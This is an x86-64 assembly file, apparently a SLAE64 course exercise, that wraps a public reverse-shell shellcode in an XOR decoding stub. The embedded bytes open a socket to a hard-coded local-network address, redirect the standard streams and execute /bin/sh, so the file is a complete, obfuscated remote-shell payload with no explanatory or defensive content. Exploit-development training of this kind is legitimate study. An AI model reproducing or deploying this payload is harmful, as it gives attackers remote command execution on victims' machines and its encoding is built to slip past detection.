; #857 reverse shell
; based on: http://shell-storm.org/shellcode/files/shellcode-857.php
; RE: https://slightofhands.com/2018/05/21/slae64-1559-0x5_analyze_three_shellcodes/
; Author: Chase Hatch SLAE64-1559

section .text
global _start
_start:

origin:
	; zero registers
	lea rbx, [rel origin]
	add bx, 50  ; shellcode offset from origin
	push rbx
	pop rdx

	;encode loop setup
	push dword 0x67656361
	mov [rsp+4], dword 0x88878685 
	movq mm1, [rsp]
	push  15  ; 118 sc len (120) / 8 * 1 pxor rounds
	pop rcx
encode_loop:
	movq mm0, [rbx]
	pxor mm0, mm1
	movq [rbx], mm0
	add bx, 0x8
	loop encode_loop
	jmp rdx
	

	shellcode:  db  0x48,0x31,0xc0,0x48,0x31,0xff,0x48,0x31,0xf6,0x48,0x31,0xd2,0x4d,0x31,0xc0,0x6a,0x02,0x5f,0x6a,0x01,0x5e,0x6a,0x06,0x5a,0x6a,0x29,0x58,0x0f,0x05,0x49,0x89,0xc0,0x48,0x31,0xf6,0x4d,0x31,0xd2,0x41,0x52,0xc6,0x04,0x24,0x02,0x66,0xc7,0x44,0x24,0x02,0x7a,0x69,0xc7,0x44,0x24,0x04,0xc0,0xa8,0x01,0x0a,0x48,0x89,0xe6,0x6a,0x10,0x5a,0x41,0x50,0x5f,0x6a,0x2a,0x58,0x0f,0x05,0x48,0x31,0xf6,0x6a,0x03,0x5e,0x48,0xff,0xce,0x6a,0x21,0x58,0x0f,0x05,0x75,0xf6,0x48,0x31,0xff,0x57,0x57,0x5e,0x5a,0x48,0xbf,0x2f,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x48,0xc1,0xef,0x08,0x57,0x54,0x5f,0x6a,0x3b,0x58,0x0f,0x05


